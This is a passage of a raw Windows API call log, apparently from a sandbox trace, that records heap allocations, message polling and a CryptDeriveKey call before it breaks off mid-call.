RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0251.999] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0252.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0252.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51bb0 [0252.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51bb0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.003] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0252.004] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0252.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0252.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0252.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0252.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0252.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0252.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0252.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0252.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0252.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.009] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0252.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", 